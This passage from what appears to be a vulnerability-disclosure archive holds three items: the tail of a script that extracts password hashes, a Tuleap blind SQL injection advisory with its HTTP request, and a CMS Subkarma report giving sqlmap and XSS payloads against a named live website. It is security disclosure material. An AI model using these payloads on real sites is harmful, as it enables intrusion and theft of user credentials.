  print get('CONCAT(members_pass_hash, 0x3a, members_pass_salt)', 'members', j)
  print '----------------'

(1512)

29Oct/140

Tuleap 7.4.99.5 Blind SQL Injection

Vulnerability title: Tuleap <= 7.4.99.5 Authenticated Blind SQL Injection in Enalean Tuleap
CVE: CVE-2014-7176
Vendor: Enalean
Product: Tuleap
Affected version: 7.4.99.5 and earlier
Fixed version: 7.5
Reported by: Jerzy Kramarz
 
Details:
 
SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injections:
 
 
GET /plugins/docman/?group_id=100&id=16&action=search&global_txt=a<SQL Injection>&global_filtersubmit=Apply HTTP/1.1
Host: 192.168.56.108
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.56.108/plugins/docman/?group_id=100
Cookie: PHPSESSID=3pt0ombsmp0t9adujgrohv8mb6; TULEAP_session_hash=d51433e1f7c9b49079c0e5c511d64c96
Connection: keep-alive
 
 
Note: In order to exploit this vulnerability a attacker needs to be in position to access '/plugins/docman/' URN.
 
 
Further details at:
 
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7176/
 
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
 
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
 
 
###############################################################
This email originates from the systems of Portcullis
Computer Security Limited, a Private limited company, 
registered in England in accordance with the Companies 
Act under number 02763799. The registered office 
address of Portcullis Computer Security Limited is: 
Portcullis House, 2 Century Court, Tolpits Lane, Watford, 
United Kingdom, WD18 9RS.  
The information in this email is confidential and may be 
legally privileged. It is intended solely for the addressee. 
Any opinions expressed are those of the individual and 
do not represent the opinion of the organisation. Access 
to this email by persons other than the intended recipient 
is strictly prohibited.
If you are not the intended recipient, any disclosure, 
copying, distribution or other action taken or omitted to be 
taken in reliance on it, is prohibited and may be unlawful. 
When addressed to our clients any opinions or advice 
contained in this email is subject to the terms and 
conditions expressed in the applicable Portcullis Computer 
Security Limited terms of business.
###############################################################
 
#####################################################################################
This e-mail message has been scanned for Viruses and Content and cleared 
by MailMarshal.
#####################################################################################

(410)

14Oct/140

CMS Subkarma Cross Site Scripting / SQL Injection

# Multiple SQL Injection & XSS on CMS SUBKARMA
 
# Risk: High
 
# CWE number: CWE-89,CWE-79
 
# Date: 13/10/2014
 
# Vendor: www.jttel.com.tw
 
# Author: Felipe " Renzi " Gabriel
 
# Contact: renzi@linuxmail.org
 
# Tested on:  Linux Mint ; Firefox ; Sqlmap 1.0-dev-nongit-20140906
 
# Vulnerables File: news.php ; product.php ; pro_con.php
 
# Exploits: http://www.target.com/news.php?id=[XSS]
 
            http://www.target.com/product.php?cat_id=[SQLI] & [XSS]
 
            http://www.target.com/pro_con.php?id=[SQLI] & [XSS]
 
 
# PoC:      http://www.cideko.com/product.php?cat_id=18  
 
            http://www.cideko.com/pro_con.php?id=3 
 
 
--- "SQLI using SQLMAP."--- 
 
    Place: GET
    Parameter: cat_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat_id=18 AND 6427=6427
 
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: cat_id=18 AND 7867=BENCHMARK(5000000,MD5(0x4d666b6e))
---
 
 
--- " XSS using HTML injection."---
 
    http://www.cideko.com/news.php?id=38"><marquee>XSS</marquee>
 
    http://www.cideko.com/product.php?cat_id=18"><marquee>XSS</marquee>
 
    http://www.cideko.com/pro_con.php?id=3"><marquee>XSS</marquee>
 
# Note
 
The SQL Injection on file pro_con.php parameter id, was published by Ali Pandidan.
Reference, http://cxsecurity.com/issue/WLB-2011020004 .
 
# Thank's

(454)